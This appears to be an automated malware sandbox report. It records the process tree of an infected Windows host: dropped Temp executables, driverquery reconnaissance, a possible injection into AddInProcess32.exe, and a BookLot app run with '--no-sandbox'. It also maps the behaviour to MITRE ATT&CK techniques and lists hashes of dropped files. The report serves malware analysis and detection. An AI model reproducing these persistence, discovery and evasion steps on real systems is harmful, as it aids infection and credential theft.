                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /d /s /c "driverquery /FO list /v"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\driverquery.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                driverquery /FO list /v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /d /s /c "driverquery /FO list /v"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\driverquery.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    driverquery /FO list /v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe" --type=utility --field-trial-handle=1524,13723991899474295402,2815493112647618201,131072 --lang=en-US --service-sandbox-type=audio --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\BookLot\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7912_2027" --service-request-channel-token=8601540821671696554 --mojo-platform-channel-handle=2512 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe" --type=gpu-process --field-trial-handle=1524,13723991899474295402,2815493112647618201,131072 --disable-gpu-sandbox --use-gl=disabled --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\BookLot\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7912_2027" --gpu-preferences=KAAAAAAAAACAAwDAAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --user-data-dir="C:\Users\Admin\AppData\Local\BookLot\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7912_2027" --service-request-channel-token=15877319082783340364 --mojo-platform-channel-handle=3536 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe" --type=utility --field-trial-handle=1524,13723991899474295402,2815493112647618201,131072 --lang=en-US --no-sandbox --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\BookLot\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7912_2027" --service-request-channel-token=10295896097795724424 --mojo-platform-channel-handle=4156 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe" --type=utility --field-trial-handle=1524,13723991899474295402,2815493112647618201,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\BookLot\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7912_2027" --service-request-channel-token=17681408184046930045 --mojo-platform-channel-handle=4284 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\30CE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\30CE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3BFB.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3BFB.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3BFB.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "{path}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\41A9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\41A9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\510B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\510B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\510B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\510B.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\510B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\510B.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\510B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\510B.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              werfault.exe /h /shared Global\5356ddf067fb4aa1bbfabdec9d74354e /t 9056 /p 5896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\A383.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\A383.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D543.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D543.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F6D6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\F6D6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9508

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1158

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1222

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1158

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1518

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1063

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1018

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\unins0000.dat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              b1fea024dd26bb61f24d14f74e21574c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              750ecb662506d66fc5a8477ad9f92685f8c9e7ee

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2038c6a04451ac48ad3cf25d95bb1bfded2d7b6d0b7c012dad70a71205ea71c9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              78633190ac428fc5b8686ef14a36214d305e57dec6281bf70a1f02d918a3db1e54b30a3941312958b4db861c2ba37c61cc8880382dab3959f728b377ca9f1a86

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\unins0000.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              466f323c95e55fe27ab923372dffff50

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              b2dc4328c22fd348223f22db5eca386177408214

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              6bfb49245a5a92113a71f731fc22fbb8397f836a123b3267196a2a4f8dd70c5c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              60e242f873d76f77ec7486460d1181468ed060113f6331ab0a4bb540531e0526177819b1413edb316e1d133bd467cfcaacbbe6eb6f63f5b9a9777f50de39cbb6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\unins0000.vbs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              6074e379e89c51463ee3a32ff955686a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              0c2772c9333bb1fe35b7e30584cefabdf29f71d1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3d4716dfe7a52575a064590797413b4d00f2366a77af43cf83b131ab43df145e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              0522292e85b179727b62271763eecb23a2042f46023336034ae8f477cd25a65e12519582d08999116d193e6e105753685356b0244c451139a21d4174fb4f6933

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2d34eaf9b7248e8783dcd5bee90a8233

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              24c793e1bf07b2117d16c515f31e6e3d0ec61eb4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              e3f41608808e1a3af150c280efec620517b2264121b2b9c8e1660b53b86e8dd3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              85557b5a0b4e591bb5a187ea102bf88a00dd54b6e07f132456122d4833b5e892fdbef8cedc6b61726b312b8d2e221318044bc5458a27328cca49d88f5b659562

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              c4c7e76d58ceaa39de6250c21c5d9b56

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              fa8bb74675f70352d3cfeca1c89a2e70df1d3a50

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1477a034f7e57411cb15d50784fd90a0d9cb7c5630f1b35e6d9fef332d1645a4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bd448f7906560c22081ef18472a77bcc6dc5157b1cb7093c642f44ab1f94af66749ac3dea10b29b1eed29dcf3a201cb480a4198bb9be8934f91de81a47770c4a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              b2a79a05faa8de8d0c9eb9196873dd3e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7c4bcc19e45dc05f1681ed545028bb6fea3bdc1d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              c58fe2453a9382d21948e7564df83a79d289f529664c7f531ffbf82e14550c67

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              dbd0ca31faa4e332d9f14cae3d8f91f13ed07ad523936014e8ffa57031db9b255b4d70ee7e62e0913808634bf41d417db05e4d566752ec3c2159fcb280af4104

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              60fe294b76f0f36c839581a5e26f5b3c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              b44eff50c1f56696f2cb4ac5e6cd5a05890223a8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              260782010fd168ca571e697cdf1eb07cbde958b7a4dfef7ae7327d7a393fcc07

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2c2961478df7bc9964c1cb1aad39d596f74e7bae1e69ab7cbe86decea7e5e512457527825d3604da10bc52eadc1df2de39df8611b025d61f8302bc7c9d152a6b

